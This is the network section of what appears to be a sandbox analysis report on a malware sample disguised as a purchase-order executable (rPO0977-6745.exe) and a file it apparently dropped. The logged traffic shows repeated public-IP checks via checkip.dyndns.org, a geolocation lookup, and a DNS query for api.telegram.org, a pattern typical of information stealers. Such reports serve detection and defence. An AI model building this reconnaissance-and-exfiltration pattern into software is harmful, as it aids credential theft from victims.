Jul 24, 2024 15:08:19.877916098 CEST	53	65140	1.1.1.1	192.168.2.7
Jul 24, 2024 15:08:35.961750031 CEST	51851	53	192.168.2.7	1.1.1.1
Jul 24, 2024 15:08:35.969769001 CEST	53	51851	1.1.1.1	192.168.2.7
Jul 24, 2024 15:08:50.730046988 CEST	53	59187	162.159.36.2	192.168.2.7
Jul 24, 2024 15:08:51.613219976 CEST	60205	53	192.168.2.7	1.1.1.1
Jul 24, 2024 15:08:51.861398935 CEST	53	60205	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 24, 2024 15:08:19.028949976 CEST	192.168.2.7	1.1.1.1	0x4989	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jul 24, 2024 15:08:19.867918968 CEST	192.168.2.7	1.1.1.1	0x77d3	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jul 24, 2024 15:08:35.961750031 CEST	192.168.2.7	1.1.1.1	0x7a6d	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jul 24, 2024 15:08:51.613219976 CEST	192.168.2.7	1.1.1.1	0x9a77	Standard query (0)	15.164.165.52.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 24, 2024 15:08:19.037156105 CEST	1.1.1.1	192.168.2.7	0x4989	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 15:08:19.037156105 CEST	1.1.1.1	192.168.2.7	0x4989	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jul 24, 2024 15:08:19.037156105 CEST	1.1.1.1	192.168.2.7	0x4989	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jul 24, 2024 15:08:19.037156105 CEST	1.1.1.1	192.168.2.7	0x4989	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jul 24, 2024 15:08:19.037156105 CEST	1.1.1.1	192.168.2.7	0x4989	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jul 24, 2024 15:08:19.037156105 CEST	1.1.1.1	192.168.2.7	0x4989	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jul 24, 2024 15:08:19.877916098 CEST	1.1.1.1	192.168.2.7	0x77d3	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 15:08:19.877916098 CEST	1.1.1.1	192.168.2.7	0x77d3	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 15:08:35.969769001 CEST	1.1.1.1	192.168.2.7	0x7a6d	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jul 24, 2024 15:08:51.861398935 CEST	1.1.1.1	192.168.2.7	0x9a77	Name error (3)	15.164.165.52.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49702	158.101.44.242	80	2916	C:\Users\user\Desktop\rPO0977-6745.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 15:08:19.051763058 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 15:08:19.649775028 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:19 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f7439ef7df636c743633f04753fff818 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 24, 2024 15:08:19.665044069 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 24, 2024 15:08:19.824407101 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:19 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4fb9cfbb46687d312e25cd081b77b635 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 24, 2024 15:08:20.601377964 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 24, 2024 15:08:20.756690979 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:20 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d0bde51ce7300093cf2b16aa028b648d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49706	158.101.44.242	80	2916	C:\Users\user\Desktop\rPO0977-6745.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 15:08:21.432101011 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 24, 2024 15:08:22.064829111 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c03c39c1c8e98df2d73a146c3ed4bc05 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 24, 2024 15:08:22.457161903 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c03c39c1c8e98df2d73a146c3ed4bc05 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 24, 2024 15:08:22.458261967 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c03c39c1c8e98df2d73a146c3ed4bc05 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49709	158.101.44.242	80	8004	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 15:08:23.086457968 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 15:08:23.676656961 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:23 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a8b463e4ff3aca8b6d49952aa6d6afb0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 24, 2024 15:08:23.687436104 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 24, 2024 15:08:23.846412897 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:23 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2b19bbf4aa8041894e82efbcef511cfd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 24, 2024 15:08:25.009537935 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 24, 2024 15:08:25.179019928 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:25 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8affa4934fe15ac25bf153104ab9ac8f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49710	158.101.44.242	80	2916	C:\Users\user\Desktop\rPO0977-6745.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 15:08:23.110166073 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 15:08:23.719739914 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:23 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e1635251a7e82f382724ab670962c989 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49714	158.101.44.242	80	2916	C:\Users\user\Desktop\rPO0977-6745.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 15:08:24.342401981 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 15:08:25.104147911 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:24 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ee66987d3a7723ed079294eea49f3153 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49717	158.101.44.242	80	2916	C:\Users\user\Desktop\rPO0977-6745.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 15:08:25.765774012 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 15:08:26.338928938 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8e80e6cb84946e743d8905388910974e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49718	158.101.44.242	80	8004	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 15:08:25.820039034 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 24, 2024 15:08:26.405514002 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 33652566a94e087a62f3e60a04e0e5ad Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49721	158.101.44.242	80	2916	C:\Users\user\Desktop\rPO0977-6745.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 15:08:27.426820993 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 15:08:28.017930984 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:27 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cbab6ed9d69598737952a58039c31a61 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49722	158.101.44.242	80	8004	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 15:08:27.451855898 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 15:08:28.037288904 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:27 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3bfbb01a97127d3b37f4e4b083b0a437 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49725	158.101.44.242	80	2916	C:\Users\user\Desktop\rPO0977-6745.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 15:08:28.774483919 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 15:08:30.032037020 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:29 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f4babb687ab767f62db48cffbc27843b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49726	158.101.44.242	80	8004	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 15:08:28.826220989 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 15:08:30.127151012 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 836917141a9acba8b48d7ad88c58fafd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49729	158.101.44.242	80	8004	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 15:08:30.800734043 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 15:08:32.402692080 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 508cc5525ea92bd7120565d588364151 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49731	158.101.44.242	80	8004	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 15:08:33.053721905 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 15:08:35.086693048 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:35 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f67cc20e8785919d9b13f456c3ca4c8b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49734	158.101.44.242	80	8004	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 15:08:35.752161980 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 15:08:37.506752968 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:37 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: dc473c0a97479fb529a6e6f12633f8f4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49704	188.114.97.3	443	2916	C:\Users\user\Desktop\rPO0977-6745.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:20 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-24 13:08:20 UTC	703	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:20 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1251 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SKYf5UTh0RQpEZ0dO2HF7boRJSAaZxHZgYT%2FSmwz%2F1HhmgXT6U8kq2SYz3lTUPZwVFV9EDnElqMoTMoqYp3w9USI3ptcBWsyjEzXWTMqv6Xeo7hKLA4K0ddye0FmbOrRE0ZHLZJE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a84236c1f5d426d-EWR alt-svc: h3=":443"; ma=86400
